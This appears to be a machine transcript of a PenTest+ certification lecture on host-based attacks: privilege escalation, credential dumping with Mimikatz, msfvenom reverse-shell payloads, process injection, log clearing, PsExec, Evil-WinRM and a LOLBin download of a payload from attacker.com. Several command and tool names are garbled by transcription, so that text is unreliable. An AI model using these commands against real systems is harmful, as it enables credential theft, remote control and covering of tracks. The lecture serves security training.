In our current section, we introduce you to host-based attacks within the CompTIA PenTest plus PT0-003 certification course. Host-based attacks are crucial in the realm of penetration testing. They target individual systems or devices within a network, allowing penetration testers to identify vulnerabilities that can be exploited locally. Understanding these attacks not only helps in securing individual hosts, but also fortifies the overall network by identifying critical security gaps. Performing host-based attacks effectively requires a deep dive into the operating systems, applications, and services that run on these hosts. Mastery in this area enables you to simulate real-world attack scenarios, ensuring comprehensive security assessments. Moving forward, our next slide will cover privilege escalation. Here, we'll define what privilege escalation attacks are, explore their impact, and delve into various techniques used to execute these attacks. We'll also look at a practical example, such as using local exploits to gain higher privileges. This knowledge will be fundamental in understanding how attackers can move laterally within a network after compromising a host. In the previous slide, we covered an introduction to host-based attacks, emphasizing the significance of understanding and executing these attacks in penetration testing. Now let's move to slide 2 and dive into privilege escalation. Privilege escalation is a critical concept in penetration testing. It involves exploiting vulnerabilities to gain elevated access to resources that are typically restricted. This can have a significant impact as attackers may gain administrative privileges, providing them with broader access to the system and potentially compromising its security. There are various techniques for performing privilege escalation attacks, such as exploiting misconfigurations, unpatched software, or weak access controls. For instance, local exploits might be used to escalate privileges on a system by exploiting a vulnerability within a system service or application. To illustrate this, consider an example where an attacker uses a local exploit on a misconfigured or outdated service to gain higher privileges. Successfully executing such an exploit can transform limited user access into admin-level access, enabling the attacker to manipulate the system more freely. In the upcoming slide, we'll explore another crucial aspect of host-based attacks, credential dumping. We'll define credential dumping, discuss its implications, and examine techniques used to perform these attacks, including a practical example with Mimikatz. So, stay tuned. On the previous slide, we delved into privilege escalation. We covered its definition and impact, explored various techniques used to escalate privileges, and looked at an example where local exploits were used to gain higher-level access within a system. Now, transitioning to slide 3, our focus shifts to credential dumping. Credential dumping is the process of extracting account login information, like usernames and passwords, from a victim's system. Its impact can be significant, as compromised credentials can lead to unauthorized access to sensitive systems and data. There are several techniques attackers can use for credential dumping. One of the most popular tools employed for this purpose is Mimikatz. Mimikatz is a powerful post-exploitation tool that allows users to dump credentials from memory. As an example, the command Mimikatz securalsa logon passwords can be used within the Mimikatz environment to retrieve logon passwords from the system. In the next slide, we will explore the concept of circumventing security tools. This involves understanding how attackers bypass security measures and the techniques they use, such as obfuscation, to evade detection by antivirus programs and other security mechanisms. Picking up from where we left off with credential dumping and the use of tools like Mimikatz, let's move on to slide 4, circumventing security tools. In this section, we'll start with the definition and impact of circumventing security tools. Essentially, this refers to the methods employed by attackers to bypass or defeat the various security measures in place, such as antivirus programs, firewalls, and intrusion detection systems. The impact of successful circumvention can be profound, allowing attackers to move freely within a compromised environment and conduct further reconnaissance or extraction of valuable data without detection. Next, we will cover the techniques that are commonly used to achieve this bypass. These can range from using legitimate tools in unexpected ways to employing custom-built malware that has been specifically designed to evade current security measures. One notable example we will discuss is the use of obfuscation techniques to evade antivirus detection. Obfuscation involves manipulating the code in a way that makes it difficult for security tools to recognize it as, while still allowing it to execute its intended payload. This could involve encoding the payload, using polymorphic code that changes with each execution, or even injecting the malicious code into otherwise benign processes. By understanding these techniques, we raise our awareness and improve our defensive strategies to better protect our environments from such sophisticated methods of attack. In the upcoming slide, we will delve into misconfigured endpoints, exploring the definition, risks, and exploitation techniques associated with this common vulnerability. We'll provide a practical example of finding and exploiting open shares on a network to highlight the importance of properly securing and configuring endpoints. Let's move on to ensure we stay ahead of these evolving threats. Now let's move on to the current slide, misconfigured endpoints. Here we'll define what misconfigured endpoints are and explain the risks associated with them. Misconfigured endpoints refer to devices within a network that haven't been set up correctly, leaving them vulnerable to attacks. These endpoints could be anything from workstations and laptops to servers and IoT devices. The risks posed by misconfigured endpoints are significant. Attackers can exploit these weaknesses to gain unauthorized access, extract sensitive information, or escalate their privileges within the network. To do so, they often use specific techniques tailored to detect and exploit these misconfigurations. For instance, attackers may search for and take advantage of open shares on a network. Open shares that are improperly configured can provide attackers a treasure trove of files and data without needing special access permissions. An example of this exploitation might involve using automated scanning tools to identify open network shares and then navigating those shares to retrieve sensitive documents, install malware, or use legitimate files to further the attack. In the next slide, we'll delve into payload obfuscation, seeking to understand why it's important and exploring techniques for creating obfuscated payloads to evade detection. Moving on from our discussion on misconfigured endpoints, we now delve into a crucial concept in penetration testing and cybersecurity, payload obfuscation. Payload obfuscation refers to techniques used to disguise malicious payloads to evade detection by security software. This step is critical to enhance the likelihood of a successful compromise without raising alarms. There are several methods for obfuscating payloads. For instance, you can use encryption, encoding, or packers to obscure the payload's true nature. A common tool used in this regard is MSF-Venom, which allows for the creation of various payloads with different types of obfuscation. Let's consider an example. Using MSF-Venom, you can generate an obfuscated payload like this. MSF-Venom-P Windows meter preter / reverse TCP, lhost equals 192.168.10, lport equals 4444. In this command, nice-p specifies the payload type, which in this case is Windows / meter preter / reverse TCP. The lhost and lport options set the listener IP address and port respectively. The nice-e option is used for encoding the payload to obscure its signature. These techniques not only enhance the stealth of the payload, but also significantly increase the chances of bypassing traditional security measures like antivirus and intrusion detection systems. In the next slide, we will explore user-controlled access bypass. This involves exploiting weaknesses in user-controlled access mechanisms, often due to improper or weak ACLs, access control lists, to gain unauthorized access. On our previous slide, we discussed payload obfuscation, its definition, and why it's crucial in penetration testing. We covered various techniques for obfuscating payloads, and we even looked at an example using MSF-Venom to create an obfuscated payload. Now, let's turn our attention to Slide 7, User-Controlled Access Bypass. Here, we'll examine what user-controlled access bypass is and its potential impact on security. Essentially, this type of bypass involves circumventing restrictions that should prevent unauthorized user actions, often targeting weak access control lists, ACLs. We'll also delve into several techniques to achieve this bypass. One common method involves exploiting improperly configured ACLs. For instance, if an ACL is set too permissively, an attacker may gain unauthorized access to sensitive files or systems. We'll check out a specific example where weak ACLs can be exploited to achieve unauthorized access. This hands-on example will illustrate how important it is to properly configure and review ACL settings regularly to ensure that access permissions are correctly enforced. In the upcoming slide, we'll discuss shell escape. This will include its definition and significance, methods to perform shell escapes, and an example scenario highlighting how to escape from restricted shell environments. Understanding these access bypass techniques is fundamental to identifying and mitigating potential vulnerabilities in your systems. Let's dive deeper into the specifics of user-controlled access bypass. On this slide, we're going to discuss the concept of shell escape. A shell escape occurs when an attacker is able to break out of a restricted shell environment, thereby gaining access to the underlying operating system. This type of vulnerability can have serious security implications because it often allows the attacker to execute arbitrary commands, escalating their privileges or accessing sensitive data. To perform a shell escape, attackers utilize a variety of techniques, such as exploiting poorly configured command restrictions, leveraging specific inputs that circumvent the shell's limitations, or manipulating environment variables. For instance, consider a restricted shell environment that limits user access to only a few commands for security reasons. By leveraging an oversight in script handling, such as a command that improperly handles user input, an attacker might successfully execute a new shell session that bypasses these restrictions, thereby gaining unauthorized access to system functionality. Now that we've covered shell escapes, our next slide will explore kiosk escapes, where we'll discuss how attackers can break out of kiosk mode on public terminals and the implications of such exploits. In the previous slide, we explored shell escape techniques, delving into their definitions, impact, and step-by-step methods to escape restrictive shell environments effectively. Now, let's turn our attention to slide 9, which focuses on kiosk escape. A kiosk escape refers to the process of breaking out of a restricted user interface environment, commonly found on public terminals and interactive kiosks. These environments are typically designed to limit user interaction to specific applications or functions to ensure security and usability. Understanding kiosk escape is crucial because it can lead to unauthorized access to the underlying operating system, potentially compromising sensitive information or system integrity. To perform a kiosk escape, attackers often exploit vulnerabilities in the limited interface, such as using keyboard shortcuts, browser features, or flaws in the allowed applications. This could enable them to gain access to standard desktop functionalities or even execute arbitrary commands. For example, one popular technique involves using system dialogues or URL schemes to break out of a browser-based kiosk mode, providing an attacker with full access to the underlying OS. In the next slide, we will discuss library injection, where similar critical concepts will be examined, including its definition, impact, and practical techniques for execution, such as DLL injection to manipulate process behavior. Let's keep moving forward to understand how these methods can be leveraged, countered, and mitigated. On the previous slide, we discussed kiosk escape. We covered what it means to escape a kiosk environment, the potential consequences, and some techniques for doing so, such as breaking out of kiosk mode on public terminals. Now let's delve into library injection. Library injection is a technique used by attackers to insert malicious code into a running process by exploiting dynamic link libraries, DLLs. The impact of such an injection can be significant, as it allows the attacker to manipulate the behavior of a legitimate process, potentially leading to unauthorized actions or data exfiltration. There are several methods for performing library injection. One common technique is DLL injection, where a malicious DLL is loaded into the memory space of a target process. This can be achieved through various Windows APIs such as Create Remote Thread and Load Library. An example of this would be injecting a DLL into a process to alter its functionality, effectively hijacking the process to perform actions desired by the attacker. In our next slide, we will explore process hollowing and injection. We will define what process hollowing and injection involve, discuss their impact, and provide an example using PowerShell to inject code into a running process. demonstrating how these techniques can be effectively employed. Now, moving on to slide 11, we will focus on process hollowing and injection. This technique refers to the manipulation of a process to either insert or replace the code executing within that process. So, what exactly are process hollowing and injection? Essentially, process hollowing involves creating a process in a suspended state, unmapping its memory, and replacing it with the malicious code. This technique can be powerful as it allows the malicious code to run in the context of a legitimate, often higher privileged process. What about process injection? Similar to hollowing, but slightly different, this technique involves injecting code into an already running process. This method is particularly effective for evading detection as the injected code runs under the guise of a legitimate process. To illustrate, let's take an example using PowerShell to inject code into a running Notepad process. Here's a quick look at the steps and commands. 1. We start by getting the handle of the Notepad process. $process equals get process name notepad handle equals to open process 0x1f0ffff false process.id. Remember, this is just to provide a high-level overview. In a real-world scenario, more sophisticated methods and more extensive code are used to avoid detection and maintain persistence. In the next slide, slide 12, we will discuss log tampering, its definitions, impacts, and some techniques, including using PowerShell to delete Windows event logs. Let's now proceed to understand how log tampering can be a critical part of concealment strategies. Continuing from our discussion on process hollowing and injection, we now move on to another critical aspect of maintaining stealth in malicious activities: log tampering. Slide 12 discusses log tampering. Log tampering involves the unauthorized altering, deleting, or fabricating of log entries to cover tracks and avoid detection by security systems. This can have a significant impact on the ability of security teams to identify and respond to incidents accurately. We will examine various techniques for tampering with logs. These methods can range from modifying existing entries, adding false information, or completely deleting logs to remove any evidence of malicious activity. For instance, you can use PowerShell to delete Windows event logs with a simple command: PowerShell wevtoodle system. This command clears all the entries in the system log, effectively erasing any trace of the actions taken previously. Next, we will explore unquoted service path injection, a vulnerability that can be exploited to gain elevated privileges within a system. Slide 13, unquoted service path injection. Unquoted service path injection is a common security vulnerability that occurs when a service executable's path is not enclosed in quotes and contains spaces. This allows an attacker to exploit this misconfiguration to execute arbitrary code. Now let's break down the impact. If an attacker gains control over an unquoted service path, they can potentially escalate their privileges, gaining higher-level access. This is particularly dangerous on Windows systems, where services often run with elevated privileges. Techniques for exploiting unquoted service paths typically involve identifying the vulnerable service and then placing a malicious executable in a location that will be parsed and run instead of the intended service executable. For instance, consider a service configured to run from a path like C, program files, my service, service.exe, but without quotes. An attacker could place a malicious program.exe in C/ that would then be executed using elevated privileges when the service starts. Next, we'll delve into a practical example. Suppose we have an unquoted service path. If we exploit this by placing a strategically named malicious executable in an appropriate directory, whenever the service is restarted, our malicious code gets executed. This is a straightforward yet powerful attack vector that needs careful attention in system configuration to mitigate. On the next slide, we'll be reviewing the tools commonly used for host-based attacks and discussing the importance of selecting the right tool for the job. This will help tie all the previous concepts together and show how attackers might prepare and execute such attacks more effectively. For the previous slide, slide 13, we covered the topic of unquoted service path injection. We explained the definition and impact of this vulnerability, discussed various techniques for exploiting unquoted service paths, and provided an example of how it can be leveraged to gain elevated privileges. Moving on to the current slide, slide 14, We'll now look at an overview of tools used for host-based attacks. Understanding the tools available is crucial for successfully executing such attacks. We'll highlight the importance of selecting the right tool for each specific type of attack. This ensures efficiency and increases the likelihood of success while minimizing potential risks and detection. In the following slide, slide 15, we'll focus specifically on the powerful tool known as Mimikatz. We'll give an overview of Mimikatz, explore techniques for using it in host-based attacks, and demonstrate an example of using Mimikatz to dump the Local Security Authority Subsystem Service (LSS) memory. The command we'll look into is Mimikatz hap securlsa logon passwords. Now let's dive into a specific tool that's widely used in host-based attacks, Mimikatz. Mimikatz is a powerful security tool for Windows that can be used to extract plaintext passwords, hash, PIN codes, and Kerberos tickets from memory. One of the main reasons Mimikatz is so popular is due to its effectiveness in dumping Local Security Authority Subsystem Service (LS) memory. This can be particularly useful for gaining access to high-value credentials stored within a compromised system. On this slide, we'll discuss techniques for using Mimikatz in host-based attacks. For instance, the command Mimikatz securlsa logon passwords can be employed to dump passwords of currently logged-in users from the LSAS memory, which is a common initial step to escalate privileges within a network. To execute this, you would first need to have administrative access or use an exploit that provides you with system privileges. Once you have that, running Mimikatz with the aforementioned command dumps the credentials, which can then be used for further lateral movement and access. In the next slide, we'll explore another potent tool, Rubeus. Continuing from our previous discussion on Mimikatz, let's now dive into another powerful tool, Rubeus. Rubeus is a C# tool for interaction with Kerberos that is often employed in post-exploitation scenarios. It simplifies the process of Kerberos ticket attacks by providing a range of functionalities that are relatively straightforward to use. When it comes to techniques for host-based attacks, Rubeus can be instrumental. For instance, it can be used to request ticket-granting tickets, TGTs, renew or import tickets, and even perform pass-the-ticket, PT attacks. These capabilities make it an invaluable tool for penetration testers and red teams who need to exploit Kerberos authentication mechanisms. To illustrate a practical example, consider the scenario where you want to perform a Kerberos ticket delegation attack. By running the command rubeus.exe tgtdeleg, you can extract TGTs that are available on a compromised machine and reuse them to impersonate users. This ability to harvest and manipulate Kerberos tickets allows attackers to escalate their privileges and move laterally across the network. Moving to the next topic, we will discuss Certify. Certify is another essential tool focusing on identifying and exploiting vulnerabilities in certificate templates. As we move on to slide 17, we'll be discussing the Certify tool. Just as we covered Rubeus, we'll start with an overview of what Certify is and why it's critical for host-based attack scenarios. Certify specializes in the enumeration and abuse of Active Directory Certificate Services, ADCS. This tool is powerful when it comes to identifying vulnerable certificate templates that can be exploited. Understanding its functionality enables security testers and adversaries alike to gauge the risks associated with improperly configured certificate services. In practical use, for instance, the command certify.exe find/vulnerable is employed to scan the environment for certificate templates that are misconfigured or vulnerable. This allows attackers to potentially forge certificates that might be used for other malicious activities, such as impersonation in a domain environment. In the next slide, we will take a closer look at the Seatbelt tool, which is another valuable asset used for gathering extensive system information in a host-based attack. Continuing from our previous discussion on the Certify tool, let's now delve into another important utility for host-based attacks, Seatbelt. Slide 18. Seatbelt. First, we will provide an overview of the Seatbelt tool, which is designed for performing various system checks on a host machine. It helps attackers and security professionals alike gather comprehensive system information. we'll explore several techniques for employing Seatbelt during host-based attacks. One powerful feature of Seatbelt is its ability to collect detailed insights about the system, making it easier to identify potential vulnerabilities and misconfigurations. As an example, we can use Seatbelt to gather a wide array of system information with a single command. Running seatbelt.exe group equals all allows us to compile data from multiple categories, offering a holistic view of the system environment. In the next slide, we will discuss PowerShell and PowerShell Integrated Scripting Environment, ISE, focusing on their capabilities and how these tools can be leveraged during host-based attacks. In the previous slides, we covered Seatbelt, an essential tool for gathering detailed system information during host-based attacks. Now, let's shift our focus to PowerShell and the PowerShell Integrated Scripting Environment, or ISE. PowerShell is a powerful task automation and configuration management framework consisting of a command line shell and an associated scripting language. PowerShell ISE enhances this utility by providing an integrated development environment with features such as syntax highlighting, tab completion, and debugging capabilities. When it comes to host-based attacks, PowerShell can be a game changer due to its ability to interact seamlessly with the Windows operating system. An effective technique involves using PowerShell for process injection. This can be done by first retrieving the target process using the getProcess commandlet, as shown here. PowerShell process equals getDatProcess-name notepad. Then we can use the kernel32 openProcess method to obtain a handle to this process. PowerShell handle openProcess 0x10fff false process.id. This example showcases how PowerShell can be leveraged to manipulate processes running on the system, which is a common method in advanced persistent threat (APT) scenarios. In the next slide, we'll delve into PsExec, another powerful tool. Specifically, we will look at how to execute commands on remote systems, which opens up further capabilities for both administrative tasks and potential misuse in an attack scenario. Continuing our discussion on host-based attack techniques, let's move on to PsExec on slide 20. PsExec is a powerful tool from the sysinternals suite that allows administrators to execute commands on remote systems, but it can also be used maliciously. First, we'll cover an overview of what PsExec is and the kind of capabilities it provides. PsExec can run commands interactively or non-interactively on remote systems, copy files to and from remote systems, and even redirect input-output to your local machine. Next, we'll examine some techniques for using PsExec in host-based attacks. Attackers often use PsExec to move laterally within a network by executing commands or deploying malware on other machines. For an example, we have a simple command using PsExec to open a remote command prompt on a target machine. The command looks like this: psexec.exe target thmad.exe. In this example, target represents the target machine's network address or name, and tmad.exe is the command we want to run on the remote system. This kind of usage highlights how attackers can control remote systems once access is gained to the network. In the next slide, we will talk about another powerful tool, Evil-WinRM, and how it can be used in similar ways to gain unauthorized access to Windows targets. Let's move forward to slide 21. On the previous slide, we explored PsExec, a useful tool for executing commands on remote systems. We discussed its overview, techniques for usage, and provided an example command to execute on a target system using PsExec. Now, let's move on to another powerful tool for host-based attacks, Evil-WinRM. Evil-WinRM is specifically designed for Windows environments, allowing attackers to gain remote shell access to Windows systems. We will cover an overview of Evil-WinRM, techniques for utilizing this tool effectively in attacks, and conclude with a practical example. To gain a shell on a Windows target, we might use a command such as bash evil-winrm i92.168.1.10-u administrator-p password. This command connects to the target machine at the specified IP address with the given credentials, providing us with a remote shell. In our next slide, we'll delve into living off the land binaries, or LOL bins, which are legitimate utilities that attackers often leverage to execute malicious activities while avoiding detection. We'll discuss different techniques for using LOL bins in host-based attacks and provide an example, such as using certutil.exe to download and execute a payload. Stay tuned as we continue to explore how attackers manipulate common tools and binaries to compromise systems. Continuing from our previous discussion on Evil-WinRM, now we shift our focus to living off the land binaries, or LOL bins. Living off the land binaries are legitimate binaries that come pre-installed on Windows systems. Attackers often leverage these to bypass security controls because, unlike malicious software, these binaries don't raise immediate red flags. To use LOL bins effectively in host-based attacks, it is crucial to understand the different ways these binaries can be manipulated. For instance, Circumventing.exe is a well-known LOL bin that can be used to download files from a remote server without triggering many security alerts. Let's look at a quick example. To download a payload from an attacker's server, one could use a command like circumventing.exe-url cache spliff and /attacker.com/payload.exe payload.exe. This command fetches a malicious payload from the specified URL and saves it locally as payload.exe. Since circumventing.exe is a trusted binary, many security systems might not detect this action as suspicious. In our final segment, we'll summarize these host-based attack techniques and tools and discuss the importance of mastering them for successful penetration testing. Hope that helps in understanding LOL bins. Make sure to practice these techniques responsibly and in a legally safe environment. To wrap things up, let's summarize what we've covered regarding host-based attack techniques and tools. In the previous sections, we took a deep dive into the concept of living off the land binaries, LOL bins, looking specifically at how legitimate system tools can be leveraged for malicious purposes. You saw examples, such as using circumventing.exe to bypass security controls and fetch malicious payloads. On this concluding slide, our focus is on reinforcing the importance of these techniques. Mastering host-based attack tactics is crucial for becoming a proficient penetration tester. These skills not only help you understand how attackers operate, but also enable you to better defend against such threats. As you move forward, it's essential to practice these techniques regularly and continue expanding your knowledge. The field of cybersecurity is ever evolving, and staying updated with the latest tools and methods will ensure you remain effective in your role. For your next steps, I recommend diving deeper into specific LOL bins and exploring other advanced penetration testing strategies. Further learning could involve hands-on labs, advanced courses, or participating in security challenges to refine your skills. Keep pushing your boundaries, and remember, practice is key to mastering the art of penetration testing.